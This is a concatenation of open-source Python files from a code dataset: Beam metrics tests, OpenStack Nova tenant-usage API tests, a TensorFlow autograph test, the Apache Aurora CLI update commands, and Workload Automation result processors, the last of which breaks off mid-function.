MetricResult(MetricKey('step1', self.name2), 0, 5),
MetricResult(MetricKey('step2', self.name1), 0, 1)]))
hc.assert_that(results['distributions'],
hc.contains_inanyorder(*[
MetricResult(
MetricKey('step1', self.name1),
DistributionResult(dist_zero),
DistributionResult(DistributionData(3, 1, 3, 3))),
MetricResult(
MetricKey('step2', self.name3),
DistributionResult(dist_zero),
DistributionResult(DistributionData(8, 2, 4, 4)))]))
metrics.commit_physical(
object(),
MetricUpdates(
counters={MetricKey('step1', self.name1): -3,
MetricKey('step2', self.name1): -5},
distributions={MetricKey('step1', self.name1):
DistributionData(8, 4, 1, 5),
MetricKey('step2', self.name2):
DistributionData(8, 8, 1, 1)}))
results = metrics.query()
hc.assert_that(results['counters'],
hc.contains_inanyorder(*[
MetricResult(MetricKey('step1', self.name1), 0, 4),
MetricResult(MetricKey('step1', self.name2), 0, 5),
MetricResult(MetricKey('step2', self.name1), 0, -4)]))
hc.assert_that(results['distributions'],
hc.contains_inanyorder(*[
MetricResult(
MetricKey('step1', self.name1),
DistributionResult(dist_zero),
DistributionResult(DistributionData(11, 5, 1, 5))),
MetricResult(
MetricKey('step2', self.name3),
DistributionResult(dist_zero),
DistributionResult(DistributionData(8, 2, 4, 4))),
MetricResult(
MetricKey('step2', self.name2),
DistributionResult(dist_zero),
DistributionResult(DistributionData(8, 8, 1, 1)))]))
metrics.commit_logical(
object(),
MetricUpdates(
counters={MetricKey('step1', self.name1): 3,
MetricKey('step1', self.name2): 5,
MetricKey('step2', self.name1): -3},
distributions={MetricKey('step1', self.name1):
DistributionData(11, 5, 1, 5),
MetricKey('step2', self.name2):
DistributionData(8, 8, 1, 1),
MetricKey('step2', self.name3):
DistributionData(4, 1, 4, 4)}))
results = metrics.query()
hc.assert_that(results['counters'],
hc.contains_inanyorder(*[
MetricResult(MetricKey('step1', self.name1), 3, 4),
MetricResult(MetricKey('step1', self.name2), 5, 5),
MetricResult(MetricKey('step2', self.name1), -3, -4)]))
hc.assert_that(results['distributions'],
hc.contains_inanyorder(*[
MetricResult(
MetricKey('step1', self.name1),
DistributionResult(DistributionData(11, 5, 1, 5)),
DistributionResult(DistributionData(11, 5, 1, 5))),
MetricResult(
MetricKey('step2', self.name3),
DistributionResult(DistributionData(4, 1, 4, 4)),
DistributionResult(DistributionData(8, 2, 4, 4))),
MetricResult(
MetricKey('step2', self.name2),
DistributionResult(DistributionData(8, 8, 1, 1)),
DistributionResult(DistributionData(8, 8, 1, 1)))]))
if __name__ == '__main__':
unittest.main()
| mxm/incubator-beam | sdks/python/apache_beam/runners/direct/direct_metrics_test.py | Python | apache-2.0 | 9,689 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
from lxml import etree
import webob
from nova.api.openstack.compute.contrib import simple_tenant_usage
from nova.compute import api
from nova import context
from nova import flags
from nova.openstack.common import jsonutils
from nova.openstack.common import policy as common_policy
from nova.openstack.common import timeutils
from nova import policy
from nova import test
from nova.tests.api.openstack import fakes
FLAGS = flags.FLAGS
SERVERS = 5
TENANTS = 2
HOURS = 24
ROOT_GB = 10
EPHEMERAL_GB = 20
MEMORY_MB = 1024
VCPUS = 2
NOW = timeutils.utcnow()
START = NOW - datetime.timedelta(hours=HOURS)
STOP = NOW
def fake_instance_type_get(self, context, instance_type_id):
return {'id': 1,
'vcpus': VCPUS,
'root_gb': ROOT_GB,
'ephemeral_gb': EPHEMERAL_GB,
'memory_mb': MEMORY_MB,
'name':
'fakeflavor'}
def get_fake_db_instance(start, end, instance_id, tenant_id):
return {'id': instance_id,
'uuid': '00000000-0000-0000-0000-00000000000000%02d' % instance_id,
'image_ref': '1',
'project_id': tenant_id,
'user_id': 'fakeuser',
'display_name': 'name',
'state_description': 'state',
'instance_type_id': 1,
'launched_at': start,
'terminated_at': end}
def fake_instance_get_active_by_window(self, context, begin, end, project_id):
return [get_fake_db_instance(START,
STOP,
x,
"faketenant_%s" % (x / SERVERS))
for x in xrange(TENANTS * SERVERS)]
class SimpleTenantUsageTest(test.TestCase):
def setUp(self):
super(SimpleTenantUsageTest, self).setUp()
self.stubs.Set(api.API, "get_instance_type",
fake_instance_type_get)
self.stubs.Set(api.API, "get_active_by_window",
fake_instance_get_active_by_window)
self.admin_context = context.RequestContext('fakeadmin_0',
'faketenant_0',
is_admin=True)
self.user_context = context.RequestContext('fakeadmin_0',
'faketenant_0',
is_admin=False)
self.alt_user_context = context.RequestContext('fakeadmin_0',
'faketenant_1',
is_admin=False)
def _test_verify_index(self, start, stop):
req = webob.Request.blank(
'/v2/faketenant_0/os-simple-tenant-usage?start=%s&end=%s' %
(start.isoformat(), stop.isoformat()))
req.method = "GET"
req.headers["content-type"] = "application/json"
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.admin_context))
self.assertEqual(res.status_int, 200)
res_dict = jsonutils.loads(res.body)
usages = res_dict['tenant_usages']
for i in xrange(TENANTS):
self.assertEqual(int(usages[i]['total_hours']),
SERVERS * HOURS)
self.assertEqual(int(usages[i]['total_local_gb_usage']),
SERVERS * (ROOT_GB + EPHEMERAL_GB) * HOURS)
self.assertEqual(int(usages[i]['total_memory_mb_usage']),
SERVERS * MEMORY_MB * HOURS)
self.assertEqual(int(usages[i]['total_vcpus_usage']),
SERVERS * VCPUS * HOURS)
self.assertFalse(usages[i].get('server_usages'))
def test_verify_index(self):
self._test_verify_index(START, STOP)
def test_verify_index_future_end_time(self):
future = NOW + datetime.timedelta(hours=HOURS)
self._test_verify_index(START, future)
def test_verify_show(self):
self._test_verify_show(START, STOP)
def test_verify_show_future_end_time(self):
future = NOW + datetime.timedelta(hours=HOURS)
self._test_verify_show(START, future)
def _get_tenant_usages(self, detailed=''):
req = webob.Request.blank(
'/v2/faketenant_0/os-simple-tenant-usage?'
'detailed=%s&start=%s&end=%s' %
(detailed, START.isoformat(), STOP.isoformat()))
req.method = "GET"
req.headers["content-type"] = "application/json"
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.admin_context))
self.assertEqual(res.status_int, 200)
res_dict = jsonutils.loads(res.body)
return res_dict['tenant_usages']
def test_verify_detailed_index(self):
usages = self._get_tenant_usages('1')
for i in xrange(TENANTS):
servers = usages[i]['server_usages']
for j in xrange(SERVERS):
self.assertEqual(int(servers[j]['hours']), HOURS)
def test_verify_simple_index(self):
usages = self._get_tenant_usages(detailed='0')
for i in xrange(TENANTS):
self.assertEqual(usages[i].get('server_usages'), None)
def test_verify_simple_index_empty_param(self):
# NOTE(lzyeval): 'detailed=&start=..&end=..'
usages = self._get_tenant_usages()
for i in xrange(TENANTS):
self.assertEqual(usages[i].get('server_usages'), None)
def _test_verify_show(self, start, stop):
tenant_id = 0
req = webob.Request.blank(
'/v2/faketenant_0/os-simple-tenant-usage/'
'faketenant_%s?start=%s&end=%s' %
(tenant_id, start.isoformat(), stop.isoformat()))
req.method = "GET"
req.headers["content-type"] = "application/json"
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_context))
self.assertEqual(res.status_int, 200)
res_dict = jsonutils.loads(res.body)
usage = res_dict['tenant_usage']
servers = usage['server_usages']
self.assertEqual(len(usage['server_usages']), SERVERS)
uuids = ['00000000-0000-0000-0000-00000000000000%02d' %
(x + (tenant_id * SERVERS)) for x in xrange(SERVERS)]
for j in xrange(SERVERS):
delta = STOP - START
uptime = delta.days * 24 * 3600 + delta.seconds
self.assertEqual(int(servers[j]['uptime']), uptime)
self.assertEqual(int(servers[j]['hours']), HOURS)
self.assertTrue(servers[j]['instance_id'] in uuids)
def test_verify_show_cant_view_other_tenant(self):
req = webob.Request.blank(
'/v2/faketenant_1/os-simple-tenant-usage/'
'faketenant_0?start=%s&end=%s' %
(START.isoformat(), STOP.isoformat()))
req.method = "GET"
req.headers["content-type"] = "application/json"
rules = {
"compute_extension:simple_tenant_usage:show":
[["role:admin"], ["project_id:%(project_id)s"]]
}
common_policy.set_brain(common_policy.HttpBrain(rules))
try:
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.alt_user_context))
self.assertEqual(res.status_int, 403)
finally:
policy.reset()
class SimpleTenantUsageSerializerTest(test.TestCase):
def _verify_server_usage(self, raw_usage, tree):
self.assertEqual('server_usage', tree.tag)
# Figure out what fields we expect
not_seen = set(raw_usage.keys())
for child in tree:
self.assertTrue(child.tag in not_seen)
not_seen.remove(child.tag)
self.assertEqual(str(raw_usage[child.tag]), child.text)
self.assertEqual(len(not_seen), 0)
def _verify_tenant_usage(self, raw_usage, tree):
self.assertEqual('tenant_usage', tree.tag)
# Figure out what fields we expect
not_seen = set(raw_usage.keys())
for child in tree:
self.assertTrue(child.tag in not_seen)
not_seen.remove(child.tag)
if child.tag == 'server_usages':
for idx, gr_child in enumerate(child):
self._verify_server_usage(raw_usage['server_usages'][idx],
gr_child)
else:
self.assertEqual(str(raw_usage[child.tag]), child.text)
self.assertEqual(len(not_seen), 0)
def test_serializer_show(self):
serializer = simple_tenant_usage.SimpleTenantUsageTemplate()
today = timeutils.utcnow()
yesterday = today - datetime.timedelta(days=1)
raw_usage = dict(
tenant_id='tenant',
total_local_gb_usage=789,
total_vcpus_usage=456,
total_memory_mb_usage=123,
total_hours=24,
start=yesterday,
stop=today,
server_usages=[dict(
instance_id='00000000-0000-0000-0000-0000000000000000',
name='test',
hours=24,
memory_mb=1024,
local_gb=50,
vcpus=1,
tenant_id='tenant',
flavor='m1.small',
started_at=yesterday,
ended_at=today,
state='terminated',
uptime=86400),
dict(
instance_id='00000000-0000-0000-0000-0000000000000002',
name='test2',
hours=12,
memory_mb=512,
local_gb=25,
vcpus=2,
tenant_id='tenant',
flavor='m1.tiny',
started_at=yesterday,
ended_at=today,
state='terminated',
uptime=43200),
],
)
tenant_usage = dict(tenant_usage=raw_usage)
text = serializer.serialize(tenant_usage)
print text
tree = etree.fromstring(text)
self._verify_tenant_usage(raw_usage, tree)
def test_serializer_index(self):
serializer = simple_tenant_usage.SimpleTenantUsagesTemplate()
today = timeutils.utcnow()
yesterday = today - datetime.timedelta(days=1)
raw_usages = [dict(
tenant_id='tenant1',
total_local_gb_usage=1024,
total_vcpus_usage=23,
total_memory_mb_usage=512,
total_hours=24,
start=yesterday,
stop=today,
server_usages=[dict(
instance_id='00000000-0000-0000-0000-0000000000000001',
name='test1',
hours=24,
memory_mb=1024,
local_gb=50,
vcpus=2,
tenant_id='tenant1',
flavor='m1.small',
started_at=yesterday,
ended_at=today,
state='terminated',
uptime=86400),
dict(
instance_id='00000000-0000-0000-0000-0000000000000002',
name='test2',
hours=42,
memory_mb=4201,
local_gb=25,
vcpus=1,
tenant_id='tenant1',
flavor='m1.tiny',
started_at=today,
ended_at=yesterday,
state='terminated',
uptime=43200),
],
),
dict(
tenant_id='tenant2',
total_local_gb_usage=512,
total_vcpus_usage=32,
total_memory_mb_usage=1024,
total_hours=42,
start=today,
stop=yesterday,
server_usages=[dict(
instance_id='00000000-0000-0000-0000-0000000000000003',
name='test3',
hours=24,
memory_mb=1024,
local_gb=50,
vcpus=2,
tenant_id='tenant2',
flavor='m1.small',
started_at=yesterday,
ended_at=today,
state='terminated',
uptime=86400),
dict(
instance_id='00000000-0000-0000-0000-0000000000000002',
name='test2',
hours=42,
memory_mb=4201,
local_gb=25,
vcpus=1,
tenant_id='tenant4',
flavor='m1.tiny',
started_at=today,
ended_at=yesterday,
state='terminated',
uptime=43200),
],
),
]
tenant_usages = dict(tenant_usages=raw_usages)
text = serializer.serialize(tenant_usages)
print text
tree = etree.fromstring(text)
self.assertEqual('tenant_usages', tree.tag)
self.assertEqual(len(raw_usages), len(tree))
for idx, child in enumerate(tree):
self._verify_tenant_usage(raw_usages[idx], child)
| tylertian/Openstack | openstack F/nova/nova/tests/api/openstack/compute/contrib/test_simple_tenant_usage.py | Python | apache-2.0 | 14,592 |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for anf module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.autograph.pyct import compiler
from tensorflow.contrib.autograph.pyct import parser
from tensorflow.contrib.autograph.pyct import transformer
from tensorflow.contrib.autograph.pyct.common_transformers import anf
from tensorflow.python.platform import test
class AnfTransformerTest(test.TestCase):
def _simple_source_info(self):
return transformer.EntityInfo(
source_code=None,
source_file=None,
namespace=None,
arg_values=None,
arg_types=None,
owner_type=None)
def test_basic(self):
def test_function():
a = 0
return a
node, _ = parser.parse_entity(test_function)
node = anf.transform(node, self._simple_source_info())
result, _ = compiler.ast_to_object(node)
self.assertEqual(test_function(), result.test_function())
if __name__ == '__main__':
test.main()
| jart/tensorflow | tensorflow/contrib/autograph/pyct/common_transformers/anf_test.py | Python | apache-2.0 | 1,708 |
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import datetime
import json
import textwrap
import time
from collections import namedtuple
from apache.aurora.client.api import AuroraClientAPI
from apache.aurora.client.base import combine_messages, get_update_page
from apache.aurora.client.cli import (
EXIT_API_ERROR,
EXIT_COMMAND_FAILURE,
EXIT_INVALID_CONFIGURATION,
EXIT_INVALID_PARAMETER,
EXIT_OK,
EXIT_UNKNOWN_ERROR,
Noun,
Verb
)
from apache.aurora.client.cli.context import AuroraCommandContext
from apache.aurora.client.cli.options import (
ALL_INSTANCES,
BIND_OPTION,
BROWSER_OPTION,
CONFIG_ARGUMENT,
HEALTHCHECK_OPTION,
INSTANCES_SPEC_ARGUMENT,
JOBSPEC_ARGUMENT,
JSON_READ_OPTION,
JSON_WRITE_OPTION,
STRICT_OPTION,
CommandOption
)
from apache.aurora.common.aurora_job_key import AuroraJobKey
from gen.apache.aurora.api.constants import ACTIVE_JOB_UPDATE_STATES
from gen.apache.aurora.api.ttypes import JobUpdateAction, JobUpdateKey, JobUpdateStatus
class UpdateController(object):
def __init__(self, api, context):
self.api = api
self.context = context
def get_update_key(self, job_key):
response = self.api.query_job_updates(update_statuses=ACTIVE_JOB_UPDATE_STATES, job_key=job_key)
self.context.log_response_and_raise(response)
summaries = response.result.getJobUpdateSummariesResult.updateSummaries
if response.result.getJobUpdateSummariesResult.updateSummaries:
if len(summaries) == 1:
return summaries[0].key
else:
raise self.context.CommandError(
EXIT_API_ERROR,
"The scheduler returned multiple active updates for this job.")
else:
return None
def _modify_update(self, job_key, mutate_fn, error_msg, success_msg):
update_key = self.get_update_key(job_key)
if update_key is None:
self.context.print_err("No active update found for this job.")
return EXIT_INVALID_PARAMETER
resp = mutate_fn(update_key)
self.context.log_response_and_raise(resp, err_code=EXIT_API_ERROR, err_msg=error_msg)
self.context.print_out(success_msg)
return EXIT_OK
def pause(self, job_key, message):
return self._modify_update(
job_key,
lambda key: self.api.pause_job_update(key, message),
"Failed to pause update due to error:",
"Update has been paused.")
def resume(self, job_key, message):
return self._modify_update(
job_key,
lambda key: self.api.resume_job_update(key, message),
"Failed to resume update due to error:",
"Update has been resumed.")
def abort(self, job_key, message):
return self._modify_update(
job_key,
lambda key: self.api.abort_job_update(key, message),
"Failed to abort update due to error:",
"Update has been aborted.")
def format_timestamp(stamp_millis):
return datetime.datetime.utcfromtimestamp(stamp_millis / 1000).isoformat()
MESSAGE_OPTION = CommandOption(
'--message',
'-m',
type=str,
default=None,
help='Message to include with the update state transition')
class StartUpdate(Verb):
UPDATE_MSG_TEMPLATE = "Job update has started. View your update progress at %s"
WAIT_OPTION = CommandOption(
'--wait',
default=False,
action='store_true',
help='Wait until the update completes')
def __init__(self, clock=time):
self._clock = clock
@property
def name(self):
return 'start'
def get_options(self):
return [
BIND_OPTION,
BROWSER_OPTION,
HEALTHCHECK_OPTION,
JSON_READ_OPTION,
MESSAGE_OPTION,
STRICT_OPTION,
INSTANCES_SPEC_ARGUMENT,
CONFIG_ARGUMENT,
self.WAIT_OPTION
]
@property
def help(self):
return textwrap.dedent("""\
Start a rolling update of a running job, using the update configuration within the config
file as a control for update velocity and failure tolerance.
The updater only takes action on instances in a job that have changed, meaning
that changing a single instance will only induce a restart on the changed task instance.
You may want to consider using the 'aurora job diff' subcommand before updating,
to preview what changes will take effect.
""")
def execute(self, context):
job = context.options.instance_spec.jobkey
instances = (None if context.options.instance_spec.instance == ALL_INSTANCES else
context.options.instance_spec.instance)
config = context.get_job_config(job, context.options.config_file)
if config.raw().has_cron_schedule():
raise context.CommandError(
EXIT_COMMAND_FAILURE,
"Cron jobs may only be updated with \"aurora cron schedule\" command")
api = context.get_api(config.cluster())
try:
resp = api.start_job_update(config, context.options.message, instances)
except AuroraClientAPI.UpdateConfigError as e:
raise context.CommandError(EXIT_INVALID_CONFIGURATION, e.message)
context.log_response_and_raise(resp, err_code=EXIT_API_ERROR,
err_msg="Failed to start update due to error:")
if resp.result:
update_key = resp.result.startJobUpdateResult.key
url = get_update_page(
api,
AuroraJobKey.from_thrift(config.cluster(), update_key.job),
resp.result.startJobUpdateResult.key.id)
context.print_out(self.UPDATE_MSG_TEMPLATE % url)
if context.options.wait:
return wait_for_update(context, self._clock, api, update_key)
else:
context.print_out(combine_messages(resp))
return EXIT_OK
def wait_for_update(context, clock, api, update_key):
cur_state = None
while True:
resp = api.query_job_updates(update_key=update_key)
context.log_response_and_raise(resp)
summaries = resp.result.getJobUpdateSummariesResult.updateSummaries
if len(summaries) == 1:
new_state = summaries[0].state.status
if new_state != cur_state:
cur_state = new_state
context.print_out('Current state %s' % JobUpdateStatus._VALUES_TO_NAMES[cur_state])
if cur_state not in ACTIVE_JOB_UPDATE_STATES:
if cur_state == JobUpdateStatus.ROLLED_FORWARD:
return EXIT_OK
elif cur_state == JobUpdateStatus.ROLLED_BACK:
return EXIT_COMMAND_FAILURE
else:
return EXIT_UNKNOWN_ERROR
clock.sleep(5)
elif len(summaries) == 0:
raise context.CommandError(EXIT_INVALID_PARAMETER, 'Job update not found.')
else:
raise context.CommandError(
EXIT_API_ERROR,
'Scheduler returned multiple updates: %s' % summaries)
UPDATE_ID_ARGUMENT = CommandOption(
'id',
type=str,
nargs='?',
metavar='ID',
help='Update identifier provided by the scheduler when an update was started.')
class UpdateWait(Verb):
def __init__(self, clock=time):
self._clock = clock
@property
def name(self):
return 'wait'
def get_options(self):
return [JOBSPEC_ARGUMENT, UPDATE_ID_ARGUMENT]
@property
def help(self):
return 'Block until an update has entered a terminal state.'
def execute(self, context):
return wait_for_update(
context,
self._clock,
context.get_api(context.options.jobspec.cluster),
JobUpdateKey(job=context.options.jobspec.to_thrift(), id=context.options.id))
class PauseUpdate(Verb):
@property
def name(self):
return 'pause'
def get_options(self):
return [JOBSPEC_ARGUMENT, MESSAGE_OPTION]
@property
def help(self):
return 'Pause an update.'
def execute(self, context):
job_key = context.options.jobspec
return UpdateController(context.get_api(job_key.cluster), context).pause(
job_key,
context.options.message)
class ResumeUpdate(Verb):
@property
def name(self):
return 'resume'
def get_options(self):
return [JOBSPEC_ARGUMENT, MESSAGE_OPTION]
@property
def help(self):
return 'Resume an update.'
def execute(self, context):
job_key = context.options.jobspec
return UpdateController(context.get_api(job_key.cluster), context).resume(
job_key,
context.options.message)
class AbortUpdate(Verb):
@property
def name(self):
return 'abort'
def get_options(self):
return [JOBSPEC_ARGUMENT, MESSAGE_OPTION]
@property
def help(self):
return 'Abort an in-progress update.'
def execute(self, context):
job_key = context.options.jobspec
return UpdateController(context.get_api(job_key.cluster), context).abort(
job_key,
context.options.message)
UpdateFilter = namedtuple('UpdateFilter', ['cluster', 'role', 'env', 'job'])
class ListUpdates(Verb):
@staticmethod
def update_filter(filter_str):
if filter_str is None or filter_str == '':
raise ValueError('Update filter must be non-empty')
parts = filter_str.split('/')
if len(parts) == 0 or len(parts) > 4:
raise ValueError('Update filter must be a path of the form CLUSTER/ROLE/ENV/JOB.')
# Pad with None.
parts = parts + ([None] * (4 - len(parts)))
return UpdateFilter(
cluster=parts[0],
role=parts[1],
env=parts[2],
job=parts[3])
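  # For illustration (names are hypothetical): update_filter('west/www-data/prod')
  # yields UpdateFilter(cluster='west', role='www-data', env='prod', job=None),
  # while update_filter('west') leaves role, env and job as None.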
@property
def name(self):
return 'list'
STATUS_GROUPS = dict({
'active': ACTIVE_JOB_UPDATE_STATES,
'all': set(JobUpdateStatus._VALUES_TO_NAMES.keys()),
'blocked': {
JobUpdateStatus.ROLL_FORWARD_AWAITING_PULSE, JobUpdateStatus.ROLL_BACK_AWAITING_PULSE},
'failed': {JobUpdateStatus.ERROR, JobUpdateStatus.FAILED, JobUpdateStatus.ROLLED_BACK},
'inactive': set(JobUpdateStatus._VALUES_TO_NAMES.keys()) - ACTIVE_JOB_UPDATE_STATES,
'paused': {JobUpdateStatus.ROLL_FORWARD_PAUSED, JobUpdateStatus.ROLL_BACK_PAUSED},
'succeeded': {JobUpdateStatus.ROLLED_FORWARD},
}.items() + [(k, {v}) for k, v in JobUpdateStatus._NAMES_TO_VALUES.items()])
def get_options(self):
return [
CommandOption(
'filter',
type=self.update_filter,
metavar="CLUSTER[/ROLE[/ENV[/JOB]]]",
help=('A path-like specifier for the scope of updates to list.')),
CommandOption(
"--status",
choices=self.STATUS_GROUPS,
default=[],
action="append",
help="""Update state to filter by. This may be specified multiple times, in which case
updates matching any of the specified statuses will be included."""),
CommandOption("--user", default=None, metavar="username",
help="The name of the user who initiated the update"),
JSON_WRITE_OPTION
]
@property
def help(self):
return "List summaries of job updates."
COLUMNS = [
('JOB', 47),
('UPDATE ID', 36),
('STATUS', 15),
('CREATED BY', 11),
('STARTED', 19),
('LAST MODIFIED', 19)
]
FORMAT_STR = ' '.join(["{%d:%d}" % (i, col[1]) for i, col in enumerate(COLUMNS)])
HEADER = FORMAT_STR.format(*[c[0] for c in COLUMNS])
def execute(self, context):
update_filter = context.options.filter
cluster = update_filter.cluster
if (update_filter.role is not None
and update_filter.env is not None
and update_filter.job is not None):
job_key = AuroraJobKey(
cluster=cluster,
role=update_filter.role,
env=update_filter.env,
name=update_filter.job)
else:
job_key = None
api = context.get_api(cluster)
filter_statuses = set()
for status in context.options.status:
filter_statuses = filter_statuses.union(set(self.STATUS_GROUPS[status]))
response = api.query_job_updates(
role=update_filter.role if job_key is None else None,
job_key=job_key,
update_statuses=filter_statuses if filter_statuses else None,
user=context.options.user)
context.log_response_and_raise(response)
# The API does not offer a way to query by environment, so if that filter is requested, we
# perform a more broad role-based query and filter here.
summaries = response.result.getJobUpdateSummariesResult.updateSummaries
if job_key is None and update_filter.env is not None:
summaries = [s for s in summaries if s.key.job.environment == update_filter.env]
if context.options.write_json:
result = []
for summary in summaries:
job_entry = {
"job": AuroraJobKey.from_thrift(cluster, summary.key.job).to_path(),
"id": summary.key.id,
"user": summary.user,
"started": format_timestamp(summary.state.createdTimestampMs),
"last_modified": format_timestamp(summary.state.lastModifiedTimestampMs),
"status": JobUpdateStatus._VALUES_TO_NAMES[summary.state.status]
}
result.append(job_entry)
context.print_out(json.dumps(result, indent=2, separators=[',', ': '], sort_keys=False))
else:
if summaries:
context.print_out(self.HEADER)
for summary in summaries:
context.print_out(self.FORMAT_STR.format(
AuroraJobKey.from_thrift(cluster, summary.key.job).to_path(),
summary.key.id,
JobUpdateStatus._VALUES_TO_NAMES[summary.state.status],
summary.user,
format_timestamp(summary.state.createdTimestampMs),
format_timestamp(summary.state.lastModifiedTimestampMs))
)
return EXIT_OK
class UpdateInfo(Verb):
@property
def name(self):
return 'info'
def get_options(self):
return [JSON_WRITE_OPTION, JOBSPEC_ARGUMENT, UPDATE_ID_ARGUMENT]
@property
def help(self):
return """Display detailed status information about a scheduler-driven in-progress update.
If no update ID is provided, information will be displayed about the active
update for the job."""
def execute(self, context):
if context.options.id:
key = JobUpdateKey(job=context.options.jobspec.to_thrift(), id=context.options.id)
else:
key = UpdateController(
context.get_api(context.options.jobspec.cluster),
context).get_update_key(context.options.jobspec)
if key is None:
context.print_err("There is no active update for this job.")
return EXIT_INVALID_PARAMETER
api = context.get_api(context.options.jobspec.cluster)
response = api.get_job_update_details(key)
context.log_response_and_raise(response)
details = response.result.getJobUpdateDetailsResult.details
if context.options.write_json:
result = {
"updateId": ("%s" % details.update.summary.key.id),
"job": str(context.options.jobspec),
"started": details.update.summary.state.createdTimestampMs,
"last_modified": format_timestamp(details.update.summary.state.lastModifiedTimestampMs),
"status": JobUpdateStatus._VALUES_TO_NAMES[details.update.summary.state.status],
"update_events": [],
"instance_update_events": []
}
update_events = details.updateEvents
if update_events is not None and len(update_events) > 0:
for event in update_events:
event_data = {
"status": JobUpdateStatus._VALUES_TO_NAMES[event.status],
"timestampMs": event.timestampMs
}
if event.message:
event_data["message"] = event.message
result["update_events"].append(event_data)
instance_events = details.instanceEvents
if instance_events is not None and len(instance_events) > 0:
for event in instance_events:
result["instance_update_events"].append({
"instance": event.instanceId,
"timestamp": event.timestampMs,
"action": JobUpdateAction._VALUES_TO_NAMES[event.action]
})
context.print_out(json.dumps(result, indent=2, separators=[',', ': '], sort_keys=False))
else:
context.print_out("Job: %s, UpdateID: %s" % (context.options.jobspec,
details.update.summary.key.id))
context.print_out("Started %s, last activity: %s" %
(format_timestamp(details.update.summary.state.createdTimestampMs),
format_timestamp(details.update.summary.state.lastModifiedTimestampMs)))
context.print_out("Current status: %s" %
JobUpdateStatus._VALUES_TO_NAMES[details.update.summary.state.status])
update_events = details.updateEvents
if update_events is not None and len(update_events) > 0:
context.print_out("Update events:")
for event in update_events:
context.print_out("Status: %s at %s" % (
JobUpdateStatus._VALUES_TO_NAMES[event.status],
format_timestamp(event.timestampMs)
), indent=2)
if event.message:
context.print_out(" message: %s" % event.message, indent=4)
instance_events = details.instanceEvents
if instance_events is not None and len(instance_events) > 0:
context.print_out("Instance events:")
for event in instance_events:
context.print_out("Instance %s at %s: %s" % (
event.instanceId, format_timestamp(event.timestampMs),
JobUpdateAction._VALUES_TO_NAMES[event.action]
), indent=2)
return EXIT_OK
class Update(Noun):
@property
def name(self):
return "update"
@property
def help(self):
return "Interact with the aurora update service."
@classmethod
def create_context(cls):
return AuroraCommandContext()
def __init__(self):
super(Update, self).__init__()
self.register_verb(StartUpdate())
self.register_verb(PauseUpdate())
self.register_verb(ResumeUpdate())
self.register_verb(AbortUpdate())
self.register_verb(ListUpdates())
self.register_verb(UpdateInfo())
self.register_verb(UpdateWait())
| shahankhatch/aurora | src/main/python/apache/aurora/client/cli/update.py | Python | apache-2.0 | 18,361 |
# Copyright 2013-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pylint: disable=R0201
"""
This module contains a few "standard" result processors that write results to
text files in various formats.
"""
import os
import csv
import json
from wlauto import ResultProcessor, Parameter
from wlauto.exceptions import ConfigError
from wlauto.utils.types import list_of_strings
class StandardProcessor(ResultProcessor):
name = 'standard'
description = """
Creates a ``result.txt`` file for every iteration that contains metrics
for that iteration.
The metrics are written in ::
metric = value [units]
format.
"""
def process_iteration_result(self, result, context):
outfile = os.path.join(context.output_directory, 'result.txt')
with open(outfile, 'w') as wfh:
for metric in result.metrics:
line = '{} = {}'.format(metric.name, metric.value)
if metric.units:
line = ' '.join([line, metric.units])
line += '\n'
wfh.write(line)
context.add_artifact('iteration_result', 'result.txt', 'export')
class CsvReportProcessor(ResultProcessor):
"""
Creates a ``results.csv`` in the output directory containing results for
all iterations in CSV format, each line containing a single metric.
"""
name = 'csv'
parameters = [
Parameter('use_all_classifiers', kind=bool, default=False,
global_alias='use_all_classifiers',
description="""
If set to ``True``, this will add a column for every classifier
that features in at least one collected metric.
.. note:: This cannot be ``True`` if ``extra_columns`` is set.
"""),
Parameter('extra_columns', kind=list_of_strings,
description="""
List of classifiers to use as columns.
.. note:: This cannot be set if ``use_all_classifiers`` is ``True``.
"""),
]
def validate(self):
if self.use_all_classifiers and self.extra_columns:
raise ConfigError('extra_columns cannot be specified when use_all_classifiers is True')
def initialize(self, context):
self.results_so_far = [] # pylint: disable=attribute-defined-outside-init
def process_iteration_result(self, result, context):
self.results_so_far.append(result)
self._write_results(self.results_so_far, context)
def process_run_result(self, result, context):
self._write_results(result.iteration_results, context)
context.add_artifact('run_result_csv', 'results.csv', 'export')
def _write_results(self, results, context):
if self.use_all_classifiers:
classifiers = set([])
for ir in results:
for metric in ir.metrics:
classifiers.update(metric.classifiers.keys())
extra_columns = list(classifiers)
elif self.extra_columns:
extra_columns = self.extra_columns
else:
extra_columns = []
